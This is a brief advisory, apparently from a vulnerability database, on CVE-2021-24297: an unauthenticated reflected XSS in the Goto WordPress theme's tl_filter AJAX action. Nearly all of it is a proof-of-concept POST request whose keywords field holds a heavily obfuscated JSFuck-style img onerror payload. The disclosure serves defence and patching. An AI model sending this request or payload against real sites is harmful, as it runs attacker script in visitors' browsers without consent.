Goto < 2.1 – Reflected Cross-Site Scripting (XSS) | CVE 2021-24297

Description

The theme did not properly sanitize the formvalue JSON POST parameter in its tl_filter AJAX action, leading to an unauthenticated Reflected Cross-site Scripting (XSS) vulnerability.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 9265
Connection: close

action=tl_filter&formvalue=[{"name":"keywords","value":"%27%2d%2d+%58%53%53%20%50%41%59%4c%4f%41%44%20%48%45%52%45+%2d%2d%2d%2d%2d%3e+<img+src%3dx+onerror%3d[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]][([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b([][[]]%2b[])[%2b!%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[%2b!%2b[]]%2b([][[]]%2b[])[%2b[]]%2b([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b(!![]%2b[])[%2b!%2b[]]]((!![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b([][[]]%2b[])[%2b[]]%2b(!![]%2b[])[%2b!%2b[]]%2b([][[]]%2b[])[%2b!%2b[]]%2b(%2b[![]]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b!%2b[]]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(%2b(!%2b[]%2b!%2b[]%2b!%2b[]%2b[%2b!%2b[]]))[(!![]%2b[])[%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b([]%2b[])[([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b([][[]]%2b[])[%2b!%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[%2b!%2b[]]%2b([][[]]%2b[])[%2b[]]%2b([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b(!![]%2b[])[%2b!%2b[]]][([][[]]%2b[])[%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b((%2b[])[([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b([][[]]%2b[])[%2b!%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[%2b!%2b[]]%2b([][[]]%2b[])[%2b[]]%2b([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b(!![]%2b[])[%2b!%2b[]]]%2b[])[%2b!%2b[]%2b[%2b!%2b[]]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]]](!%2b[]%2b!%2b[]%2b!%2b[]%2b[!%2b[]%2b!%2b[]])%2b(![]%2b[])[%2b!%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]])()((![]%2b[])[%2b!%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[%2b!%2b[]%2b[!%2b[]%2b!%2b[]%2b!%2b[]]]%2b([]%2b[])[(![]%2b[])[%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b([][[]]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b(!![]%2b[])[%2b!%2b[]]]()[%2b!%2b[]%2b[!%2b[]%2b!%2b[]]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[%2b!%2b[]]%2b([][[]]%2b[])[%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(%2b(!%2b[]%2b!%2b[]%2b[%2b!%2b[]]%2b[%2b!%2b[]]))[(!![]%2b[])[%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b([]%2b[])[([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b([][[]]%2b[])[%2b!%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[%2b!%2b[]]%2b([][[]]%2b[])[%2b[]]%2b([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b(!![]%2b[])[%2b!%2b[]]][([][[]]%2b[])[%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b((%2b[])[([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b([][[]]%2b[])[%2b!%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[%2b!%2b[]]%2b([][[]]%2b[])[%2b[]]%2b([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b(!![]%2b[])[%2b!%2b[]]]%2b[])[%2b!%2b[]%2b[%2b!%2b[]]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]]](!%2b[]%2b!%2b[]%2b!%2b[]%2b[%2b!%2b[]])[%2b!%2b[]]%2b(%2b(%2b!%2b[]%2b[%2b[]]%2b[%2b!%2b[]]))[(!![]%2b[])[%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b([]%2b[])[([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b([][[]]%2b[])[%2b!%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[%2b!%2b[]]%2b([][[]]%2b[])[%2b[]]%2b([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b(!![]%2b[])[%2b!%2b[]]][([][[]]%2b[])[%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b((%2b[])[([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b([][[]]%2b[])[%2b!%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[%2b!%2b[]]%2b([][[]]%2b[])[%2b[]]%2b([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b(!![]%2b[])[%2b!%2b[]]]%2b[])[%2b!%2b[]%2b[%2b!%2b[]]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]]](!%2b[]%2b!%2b[]%2b[%2b!%2b[]])[%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b([][[]]%2b[])[%2b!%2b[]]%2b([]%2b[])[(![]%2b[])[%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b([][[]]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b([][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b(!![]%2b[])[%2b!%2b[]]]()[%2b!%2b[]%2b[!%2b[]%2b!%2b[]]]%2b([%2b[]]%2b![]%2b[][(![]%2b[])[%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]])[!%2b[]%2b!%2b[]%2b[%2b[]]])>+%3c%2d%2d%2d%2d%2d"},{"name":"date","value":"5/5/2021"},{"name":"min_days","value":"0"},{"name":"max_days","value":"70"},{"name":"min_price","value":"0"},{"name":"max_price","value":"13538"},{"name":"avaibility","value":"0"},{"name":"short_by","value":"newest-to-oldest"},{"name":"view_type","value":"list"},{"name":"paged","value":"1"}]